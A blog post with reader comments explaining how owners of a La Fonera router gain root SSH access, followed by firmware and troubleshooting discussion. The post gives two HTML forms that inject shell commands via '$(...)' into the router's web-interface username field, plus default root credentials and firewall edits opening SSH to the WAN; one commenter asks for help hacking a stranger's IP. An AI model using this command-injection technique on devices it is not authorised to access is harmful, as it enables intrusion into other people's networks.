Skip to content

Hacking Fonera

Geschrieben von kalkin am
Yesterday I received my Fonera. The last two days i spend on trying to run an ssh daemon on it. After a lot of searching and surfing, i found finally with the help of this two sites a way to force fonera run ssh. I will shortly sum up the hack, it worked successful with 0.7.1 r1 fon firmware (if you have the 0.7.1.2 firmware you have to reset it.):
First you have to write to two html-pages which will inject code in your Fon-Router. Save the following code as step1.html:

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

Save the next html code as step2.html.

<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>

Now connect to your MyPlace Network, open the both sites and just click on the "Submit" button(first at the step1.html then on the step2.html page). Open your favorite shell and connect to your router via ssh with username root and password admin.
ssh root@192.168.10.1

For enabling a permanent ssh access you have to move dropbear to S50 dropbear:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

In the /etc/firewall.user you have to uncomment this lines:

# iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp --dport 22 -j ACCEPT

Now you should prevent Fon from executing received code, by editing /bin/thinclient. You have to comment the last line and add another line, so that the last two lines look like this:

#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

Now you have ssh daemon on your fonera.


btw: thanks a lot cologne.idle and "Пожалуйста не пойте под фанеру!"

Verwandte Links:

Trackbacks

Alessandro "jekil" Tanasi blog am : Hacking La Fonera

Vorschau anzeigen
Today i received my Fonera.Fonera has been designed not to be hacked. Really?Hacking the La FoneraOpenWrtDocs HardwareDd-wrt about La FoneraLa Fonera FlashingHacking FoneraOpenwrt K on la Fonera without serial consoleLa Fonera dissection and hackInside th

Coding my Life am : Fonera Downgrade

Vorschau anzeigen
If you want to downgrade your fonera from 0.7.1.2 firmware to the 0.7.1, look here.

Anonym am :

Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.

Kommentare

Ansicht der Kommentare: Linear | Verschachtelt

Aschenbash0r am :

Пожалуйста не пойте под фанеру!
=
Please do not sing under plywood!

I copy&pasted it into an online translator ;-)

kalkin am :

Never trust online translators ;-) .

ARARAT am :

Thnaks for the code. its unsefull for me. Martin

Chance am :

Now if we can just get some decent firmware with a web interface for this device.

kalkin am :

There are some people who are porting dd-wrt to fonera. dd-wrt has also a webinterface. Fore more information look in the dd-wrt forum.

Chance am :

I'm all over it. I just got mine today, and within 5 minutes I was ssh'd in and messing with stuff. I am sure I can get better at the console stuff if I have to use it, but I am lazy and would like a web interface. I have been using DD-WRT for ~2 years and love it so that would be my first choice.
Thanks

matyas am :

Hi,



I have just came accross your website. I have received a fonera too, and i have some (maybe stupid) questions: why is it good that i can have an SSH access to my fonera? what is the advantage of that? and why is it good for me that i prevent FON from executing code on my box?



thank you very much

Matyas (from Hungary)

Riku am :

> why is it good that i can have an SSH access to my fonera?

You can access to that Linux and make some changes. It's also more secure than just telnet.

> what is the advantage of that?

You can make changes.

> and why is it good for me that i prevent FON from executing code on my box?

It's security thing. FON box will execute every code it will receive from FON with out these hacks.

Jay am :

I dont think i understood the thing about uncommenting the lines in the firewall.
Can anybody help me?

Fabs am :

imho you need to write "cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')", in your code the day will not be written

kalkin am :

Thank you, I edited the line.

geek am :

By the way if you don't want those thinclients filling your Fonera's memory,

instead of this:
#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')

use this:
if [ -s /tmp/.thinclient.sh ] ; then
for f in /tmp/thin* ; do
:
done
if [ -f "$f" ]; then
if [ $(md5sum /tmp/.thinclient.sh | cut -d ' ' -f 1) != $(md5sum `ls $f` | cut -d ' ' -f 1) ] ; then
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
else
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%Y%m%d-%H%M')
fi
fi


This way a new thinclient "log" will only be created if it differs from the last one and if it's not empty. Code isn't probably very beautiful, but it seems to work :-)

kalkin am :

Great idea, thanks. :-)

fon-fan am :

when will dd-wrt be here?
do you have some more informations, links to threads on the forum?
am i right that linux 2.6 is the only thing to be ported ?

kalkin am :

http://tinyurl.com/u79m4

There is a forum thread about ddwrt on fonera.

Fabs am :

By the way: Wouldn't it be a easier to just remove the cronjob that executes /bin/thinclient every hour? crontab -r?

Late am :

You can remove the crontab, that works too, but it might be interesting to see what the thinclient fetches for you.

futejia am :

Here is another howto http://futejia.blogspot.com/2006/12/my-way-to-hack-lafonera.html
I am waiting for dd-wrt. Yeah!
Btw: the serial console sucks. I tried for more then two hours to use it.

Barol am :

dd-wrt will not herefor a while. But in the meanwhile we have Openwrt ;-) http://www.dd-wrt.com/phpBB2/viewtopic.php?p=49142

Jimmi am :

Lasst es sein !
Diese Sache muss man unterstützen, nicht
hacken !

futejia am :

1) Nur ssh Zugriff drauf verhindert ja nicht, das die FON Software läuft
2) Ich glaube Google und Ebay haben genug geld. Die brauchen unsere Unterstützung nicht.

Stefan Tomanek am :

Take a look at this:
http://stefans.datenbruch.de/lafonera/
and especially http://stefans.datenbruch.de/lafonera/whywedidit.shtml

It's not about sabotaging FON, it's about keeping in control of your network.

jarena am :

After doing this, I have SSH access to La Fonera, but I have lost internet connection via wifi. Under wireless networks I can only see my private network, not the public one. Any ideas? :-S

jarena am :

Al final el problema sólo era que tarda una barbaridad en tomar una ip por dhcp, y mientras no la toma no se ve la red pública. No sé si será algo común o no que tarde tanto, puede que sí, ya que por algún sitio leí que la flash de la fonera era muy lenta prolongando así el tiempo de arranque.

jarena am :

Ooops, sorry for using spanish hehe. In English:

At last the problem was La Fonera was taking too long to get an ip via DHCP, and while this is not done the public network can't be seen. I don't know is this is just normal, but I think so, because I read before the flash memory of La Fonera was quite slow, extending startup time.

Maurizio am :

I have the same issue: SSH access but without Internet connection. How can I overcome such slowness of IP assignment by DHCP?

kalkin am :

Do it take long to get an ip, if you are booting?

I have the same problem, if i'm changing from fixed ip to DHCP. The change take really long.
I've made experience that the best way in this cases is to restart the fonera.

Maurizio am :

Thank you for your reply.

Normally, the DHCP server on my modem/router assigns IP addresses to other network devices in a few seconds. Besides that, I've tried to restart the Fonera, with no effect.

cable am :

When using direct cable link,
You should change the web server address to 169.254.255.1 instead of 192.168.10.1. Both in the html page and the ssh session.

Rui Ponte am :

Users with the release 0.7.1.2 can't do this :-(

kalkin am :

If you got the fonera with the 0.7.1.2 and don't updated it via Webinterface. you can reset it to the 0.7.1.

You take something spiky (for example a pin) and press the reset-button, below the fonera, for 5sec. It should be reseted to the 0.7.1 firmware.

Torbar am :

Remember to unplug the ethernet cable before resetting the router. Otherwise it will keep on auto updating the firmware back to 0.7.1.2 and you will get nowhere ;-)

Rui Ponte am :

What if i've updated via webinterface?

Stefan Tomanek am :

Then you lose. Sorry, no more resets for you, the new firmware has been flashed permanently.

There is a new hack (this time called "kolofonium"), however we are not releasing it until 0.7.1.2 has become widespread on new routers - otherwise, it would be wasted

Paul am :

any estimate on when this might be available? 7.1.2 is rapidly becoming pretty widespread, what with the free 10,000 routers that went out earlier this month (of which i got mine yesterday, woohoo!).

Tiago am :

I installed dd-wrt in my fonera, but yesterday i installed fon original firmware. I download fonera.tar.gz file, that someone told me it is fonera firmware 0.7.1-r1 version but with the first 519 bytes cut. But, when i flashed the fonera and access web interface i saw that the firmware is 0.7.1-r2. I tried do reset fonera mas it didn't change firmware to 0.7.1-r1. Can I do something to hack fonera? I don't have a serial cabel :s

Stefan Tomanek am :

Get a serial cable or wait until our new hack "kolofonium" is released. We are still waiting for widespread distribution of 0.7.1.2

Michael Henn am :

How do I edit this file? /etc/firewall.user

Thanks for any help from anyone!

sp00nix am :

vi /etc/firewall.user
google the VI command list, its kinda confusing how to work

narmacil am :

check this out: this is an error message I get when trying to SSH in... Any idea how to get around this?

@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
23:55:f0:ec:9e:61:24:e8:8e:a5:0d:79:f0:85:65:64.
Please contact your system administrator.
Add correct host key in /home/Administrator/.ssh/known_hosts to get rid of this
message.
Offending key in /home/Administrator/.ssh/known_hosts:1
RSA host key for 192.168.10.1 has changed and you have requested strict checking
.
Host key verification failed.

narmacil am :

nevermind - it was the ssh client on my side, my bad.

Smiley am :

I'm trying to this on my Mac (10.4.8-) but the basic html just stays like that and won't display. I've tried to open step1/2 in Safari, Firefox, Opera, Realplayer. Seems such a simple thing to do but maybe OSX now blocks HTML somehow?

kalkin am :

I'm using Tiger too, but I have no problems.

Josh am :

OMFG NEED NEW RELEASE FOR 1.7.1.2 HELP THIS ISN"T WOKRKED!!

kalkin am :

Look here: http://mrmuh.blogspot.com/2007/01/codename-kolofonium-realease-date.html

Antonio am :

Hi everybody. I wrote a script that transforms La Fonera as a Repeater and Access Point, you can find it at http://www.blogin.it/fonera4.php
Hope you enjoy ...and improve

Antonio

Wenle am :

i have a problem, when i type in the first line of code:

$> mv /etc/init.d/dropbear /etc/init.d/S50dropbear

it responds -ash: $: not found

what does that mean? should i continue to second command?

kalkin am :

You have to enter the commands without $>. Just enter:
mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Takenover83 am :

Does anyone have a fix for loosing Internet once the SSH mod has been installed?

I have my Fonera hooked up to a WRT54GS.


Also what local webserver work ok with this guide? I tried a couple, but got error's when using wget.

For example.

Using "wget http://127.0.0.1/nameofthefile" just gives me a forbidden type of error.

But when I test the same link in a webbrowser, the webserver works just fine and allows me to download.

Paul am :

i was able to restore internet connectivity by logging into my fon's web interface, and configuring the 'internet connection' for static IP. doesn't matter what you configure it to - use 55.55.55.55 if you like - but fill in all the fields, and click 'submit'. then go right back to the configs, and reset it back to DHCP. that was enough to force to grab onto my main router and talk to the world again.

Paul am :

i also wanted to note that if your fon says it's 7.1.2, be sure and go through coldtobi's instructions. http://blog.coldtobi.de/index.php?op=ViewArticle&articleId=7&blogId=1
i was absolutely convinced that my router was 7.1.2 firmware, but after pulling my fon open (easy!) and looking, yup, 7.1.1. use coldtobi's page to reset the right way, and you'll be able to play soon yourself!

john earthquake am :

i've changed the fonera firmware...but now when i try to run the 2 pages e keeps asking me for a username and a password...any ideia ? thank you :-D

kalkin am :

Reading carefully helps. User: root Pasword: admin. ;-)

Popup2u am :

can help me hack my router 202.129.51.122

dltv am :

does the heartbeat option work in DDWRT or do i need to get an advanced script?

Most importantly can you connect to the router via the Ethernet port with DDWRT? or does it have to be wirelessly? because i cant connect to 192.168.1.1

or whatever the right ip is i still cant connect to the DDWRT interface via ethernet cable only wirelessly

Wrote a tutorial on hacking it at dltv.wordpress.com

grazzt am :

Is it possible to do these things with only the fon connected to a network card via the network cable?

I dont have any wifi cards yet.

I see the 192.168.* is for the wifi side.

The manual states to set static ip for nic to 169.254.255.2. When I do this, I can check the status of the fon by going to http://169.254.255.1 (and showing 0.71 r1 as the firmware).

Any help would be appreciated.

Thanks

grazzt am :

Sorry, for not reading, I see what to do with only a network cable and no wifi.

ANd it worked! :-)

ssd am :

i have followed the instructions here and here [http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing]. after doing step 3 and rebooting the wireless on the router stopped working. how do i get it to enable again? reset button doesnt work :-(

yea am :

Same here. After step 3 and rebooting the router just sits there and does nothing. I am not able to ssh or telnet into it. It is bricked.

dna am :

where can i get the firmware version 0.7.1 ?

anyone send me e-mail that attached it?

kalkin am :

yoda voice : Google you ask have to!

:-D

jeff am :

get the firmware 7.1 at the DD-WRT wiki on the la fonera its at the bottom of how to flash

Muhammad Waqas am :

plz tell me simple way that how ca i get ip address or how can i use other computer from my computer plz i m very much fond of use the other computer from my plz plz plz plz.

dltv am :

Read http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

Gives some networking advice.

grazzy am :

For those just using a normal nic and NO wifi, the "hacked" fon will default to DHCP for the wan ip. That is, connect your hacked FON to your computer, and have your computer run a DHCP server (in linux this is easy, under windows, who knows).

Then the FON listens to port 8080 on the wan side.

Hope this helps anyone.

Jürgen am :

Great Post. Very helpfull informations. Thanks a lot. Jürgen from Germany. :-)

Strafverteidiger München am :

This is great:

http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/

But as well a helpfull information.

eric am :

For those that are interested, here’s a site with great tutorials with screenshots for the newer Fonera firmware version 0.7.2-r3 It has guides for Redboot and flashing to DD-WRT and Legend firmware along with some other cool stuff.

http://www.fonerahacks.com

kenjiru am :

I've got to firmware version 0.7.1 r2, but no ssh :-(

Any idea what to do now?

Computmaxer am :

Ya'll should come check out the fonera-hacking community:
www.fonerahacks.com

nglrossi am :

Thanks for the clear howto, just hacked mine.
I am about to install dd-wrt now.

Angelo

Johnny am :

any chance to enable ssh on 0.7.1 r3 ?

Kommentar schreiben

Umschließende Sterne heben ein Wort hervor (*wort*), per _wort_ kann ein Wort unterstrichen werden.
Standard-Text Smilies wie :-) und ;-) werden zu Bildern konvertiert.
Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet.

Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA

Formular-Optionen